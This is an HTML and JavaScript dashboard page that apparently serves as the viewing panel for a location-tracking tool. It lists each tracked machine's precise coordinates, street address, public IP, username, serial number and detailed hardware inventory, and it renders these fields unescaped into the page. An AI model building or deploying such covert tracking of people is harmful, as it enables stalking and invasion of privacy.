<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Location Tracker Dashboard</title>
<link rel="stylesheet" href="style.css">
</head>
<body>

<div class="container">
    <!-- Header -->
    <div class="header">
        <h1>
            <span class="header-icon">📍</span>
            Location Tracker Dashboard
        </h1>
        <div class="stats">
            <div class="stat-item">
                <span class="stat-number" id="totalCount">0</span>
                <span class="stat-label">Total Locations</span>
            </div>
            <div class="stat-item">
                <span class="stat-number" id="lastUpdate">--:--</span>
                <span class="stat-label">Last Update</span>
            </div>
        </div>
    </div>

    <!-- Controls -->
    <div class="controls">
        <button class="btn-refresh" onclick="load()">
            <span>🔄</span> Refresh
        </button>
        <button class="btn-delete-all" onclick="deleteAll()">
            <span>🗑️</span> Delete All
        </button>
        <button class="btn-delete" onclick="deleteSelected()" id="btnDeleteSelected" disabled>
            <span>❌</span> Delete Selected
        </button>
        <div id="status"></div>
    </div>

    <!-- Table -->
    <div class="table-container">
        <table id="table">
            <thead>
                <tr>
                    <th style="width:40px">#</th>
                    <th>Time</th>
                    <th>Address</th>
                    <th>Street</th>
                    <th>House #</th>
                    <th>City</th>
                    <th>Operating System</th>
                    <th>Device Name</th>
                    <th>IP Address</th>
                    <th>Accuracy (m)</th>
                    <th style="width:200px">Actions</th>
                </tr>
            </thead>
            <tbody id="tbody"></tbody>
        </table>
    </div>
</div>

<!-- Modal -->
<div id="modal" class="modal">
    <div class="modal-content">
        <div class="modal-header">
            <span>System Information</span>
            <span class="close" onclick="closeModal()">&times;</span>
        </div>
        <div class="modal-body" id="modalBody"></div>
    </div>
</div>

<script>
let selectedId = null;
let locations = [];

async function load() {
    try {
        showStatus('Loading...', 'info');
        let r = await fetch('api.php');
        locations = await r.json();
        displayLocations();
        updateStats();
        showStatus(`✓ Loaded ${locations.length} location${locations.length !== 1 ? 's' : ''}`, 'success');
    } catch(e) {
        showStatus('✗ Error: ' + e.message, 'error');
    }
}

function displayLocations() {
    let html = '';
    if(locations.length === 0) {
        html = `<tr><td colspan="11" style="text-align:center">
                    <div class="empty-state">
                        <div class="empty-icon">📍</div>
                        <div class="empty-text">No locations recorded yet</div>
                    </div>
                </td></tr>`;
    } else {
        locations.forEach((loc, i) => {
            let rowClass = loc.id === selectedId ? 'selected' : '';
            let shortAddress = loc.address ? (loc.address.length > 40 ? loc.address.substring(0, 37) + '...' : loc.address) : '-';
            let shortOS = loc.os ? (loc.os.length > 25 ? loc.os.substring(0, 22) + '...' : loc.os) : '-';
            
            let accuracyBadge = '';
            if(loc.accuracy) {
                if(loc.accuracy < 10) accuracyBadge = 'badge-success';
                else if(loc.accuracy < 50) accuracyBadge = 'badge-warning';
                else accuracyBadge = 'badge-danger';
            }
            
            html += `<tr class="${rowClass}" onclick="selectRow('${loc.id}')">
                <td>${i+1}</td>
                <td>${loc.time || '-'}</td>
                <td title="${loc.address || '-'}">${shortAddress}</td>
                <td>${loc.street || '-'}</td>
                <td>${loc.house_number || '-'}</td>
                <td>${loc.city || '-'}</td>
                <td title="${loc.os || '-'}">${shortOS}</td>
                <td>${loc.device_name || '-'}</td>
                <td>${loc.ip || '-'}</td>
                <td><span class="badge ${accuracyBadge}">${loc.accuracy?.toFixed(1) || '-'}</span></td>
                <td>
                    <button class="btn-maps" onclick="event.stopPropagation(); openMap(${loc.lat},${loc.lon})">
                        🗺️ Maps
                    </button>
                    <button class="btn-info" onclick="event.stopPropagation(); showSystemInfo('${loc.id}')">
                        ℹ️ Info
                    </button>
                </td>
            </tr>`;
        });
    }
    document.getElementById('tbody').innerHTML = html;
}

function updateStats() {
    document.getElementById('totalCount').textContent = locations.length;
    if(locations.length > 0) {
        const lastTime = new Date(locations[0].time);
        document.getElementById('lastUpdate').textContent = lastTime.toLocaleTimeString();
    }
}

function selectRow(id) {
    selectedId = id;
    displayLocations();
    document.getElementById('btnDeleteSelected').disabled = false;
}

function openMap(lat, lon) {
    window.open(`https://www.google.com/maps/search/?api=1&query=${lat},${lon}`, '_blank');
}

function showSystemInfo(id) {
    let loc = locations.find(l => l.id === id);
    if(!loc) return;
    
    let html = `
        <div class="info-section section-location">
            <div class="info-section-title">📍 Location Information</div>
            <div class="info-row">
                <div class="info-label">🕐 Date & Time:</div>
                <div class="info-value">${loc.time || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">📍 Latitude:</div>
                <div class="info-value">${loc.lat?.toFixed(8) || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">📍 Longitude:</div>
                <div class="info-value">${loc.lon?.toFixed(8) || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">🎯 Accuracy:</div>
                <div class="info-value">${loc.accuracy?.toFixed(2) || '-'} meters</div>
            </div>
            <div class="info-row">
                <div class="info-label">⏱️ Timestamp:</div>
                <div class="info-value">${loc.timestamp || '-'}</div>
            </div>
        </div>
        
        <div class="info-section section-address">
            <div class="info-section-title">🏠 Detailed Address</div>
            <div class="info-row">
                <div class="info-label">📍 Full Address:</div>
                <div class="info-value">${loc.address || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">🛣️ Street Name:</div>
                <div class="info-value">${loc.street || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">🏠 House Number:</div>
                <div class="info-value">${loc.house_number || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">🏘️ Suburb/Neighborhood:</div>
                <div class="info-value">${loc.suburb || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">🏙️ City:</div>
                <div class="info-value">${loc.city || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">🗺️ State/Province:</div>
                <div class="info-value">${loc.state || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">📮 Postal Code:</div>
                <div class="info-value">${loc.postcode || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">🌍 Country:</div>
                <div class="info-value">${loc.country || '-'}</div>
            </div>
        </div>
        
        <div class="info-section section-system">
            <div class="info-section-title">💻 System Information</div>
            <div class="info-row">
                <div class="info-label">🖥️ Operating System:</div>
                <div class="info-value">${loc.os || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">🏗️ Architecture:</div>
                <div class="info-value">${loc.os_architecture || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">📅 OS Install Date:</div>
                <div class="info-value">${loc.os_install_date || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">🏷️ Windows Edition:</div>
                <div class="info-value">${loc.windows_edition || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">🔢 Build Number:</div>
                <div class="info-value">${loc.windows_build || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">⏳ Uptime:</div>
                <div class="info-value">${loc.uptime || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">📐 Screen Resolution:</div>
                <div class="info-value">${loc.screen_resolution || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">🔧 .NET Version:</div>
                <div class="info-value">${loc.dotnet_version || '-'}</div>
            </div>
        </div>
        
        <div class="info-section section-user">
            <div class="info-section-title">👤 User Information</div>
            <div class="info-row">
                <div class="info-label">👤 Username:</div>
                <div class="info-value">${loc.pc_name || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">🖥️ Device Name:</div>
                <div class="info-value">${loc.device_name || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">🏢 Domain:</div>
                <div class="info-value">${loc.domain || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">🌐 Public IP Address:</div>
                <div class="info-value">${loc.ip || '-'}</div>
            </div>
        </div>
        
        <div class="info-section section-hardware">
            <div class="info-section-title">🔧 Hardware</div>
            <div class="info-row">
                <div class="info-label">🏭 Manufacturer:</div>
                <div class="info-value">${loc.manufacturer || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">📦 Model:</div>
                <div class="info-value">${loc.model || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">🔢 Serial Number:</div>
                <div class="info-value">${loc.serial_number || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">⚡ BIOS Version:</div>
                <div class="info-value">${loc.bios_version || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">🖲️ Motherboard:</div>
                <div class="info-value">${loc.motherboard || '-'}</div>
            </div>
        </div>
        
        <div class="info-section section-processor">
            <div class="info-section-title">⚙️ Processor & Memory</div>
            <div class="info-row">
                <div class="info-label">🧠 Processor:</div>
                <div class="info-value">${loc.cpu_name || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">🔢 Cores:</div>
                <div class="info-value">${loc.cpu_cores || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">🔀 Threads:</div>
                <div class="info-value">${loc.cpu_threads || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">⚡ CPU Speed:</div>
                <div class="info-value">${loc.cpu_speed || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">💾 Total RAM:</div>
                <div class="info-value">${loc.ram_total || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">💾 Available RAM:</div>
                <div class="info-value">${loc.ram_available || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">🎮 Graphics Card:</div>
                <div class="info-value">${loc.gpu || '-'}</div>
            </div>
        </div>
        
        <div class="info-section section-storage">
            <div class="info-section-title">💿 Storage & Network</div>
            <div class="info-row">
                <div class="info-label">💿 Hard Drives:</div>
                <div class="info-value">${loc.drives || '-'}</div>
            </div>
            <div class="info-row">
                <div class="info-label">🌐 Network Adapters:</div>
                <div class="info-value">${loc.network_adapters || '-'}</div>
            </div>
        </div>
        
        <div class="info-section section-id">
            <div class="info-section-title">🆔 System Identifiers</div>
            <div class="info-row">
                <div class="info-label">🆔 Location ID:</div>
                <div class="info-value">${loc.id || '-'}</div>
            </div>
        </div>
    `;
    
    document.getElementById('modalBody').innerHTML = html;
    document.getElementById('modal').style.display = 'block';
}

function closeModal() {
    document.getElementById('modal').style.display = 'none';
}

window.onclick = function(event) {
    if(event.target == document.getElementById('modal')) {
        closeModal();
    }
}

async function deleteSelected() {
    if(!selectedId) return;
    
    if(!confirm('Are you sure you want to delete this location?')) return;
    
    try {
        let r = await fetch('api.php', {
            method: 'DELETE',
            headers: {'Content-Type': 'application/json'},
            body: JSON.stringify({id: selectedId})
        });
        
        let data = await r.json();
        if(data.success) {
            showStatus('✓ Location deleted successfully', 'success');
            selectedId = null;
            document.getElementById('btnDeleteSelected').disabled = true;
            load();
        } else {
            showStatus('✗ Failed to delete location', 'error');
        }
    } catch(e) {
        showStatus('✗ Error: ' + e.message, 'error');
    }
}

async function deleteAll() {
    if(!confirm('Are you sure you want to delete ALL locations?\n\nThis action cannot be undone!')) return;
    
    try {
        let r = await fetch('api.php', {
            method: 'DELETE',
            headers: {'Content-Type': 'application/json'},
            body: JSON.stringify({delete_all: true})
        });
        
        let data = await r.json();
        if(data.success) {
            showStatus('✓ All locations deleted', 'success');
            selectedId = null;
            document.getElementById('btnDeleteSelected').disabled = true;
            load();
        } else {
            showStatus('✗ Failed to delete all locations', 'error');
        }
    } catch(e) {
        showStatus('✗ Error: ' + e.message, 'error');
    }
}

function showStatus(message, type) {
    const status = document.getElementById('status');
    status.textContent = message;
    status.className = type;
}

// Auto refresh every 10 seconds
setInterval(load, 10000);

// Initial load
load();
</script>
</body>
</html>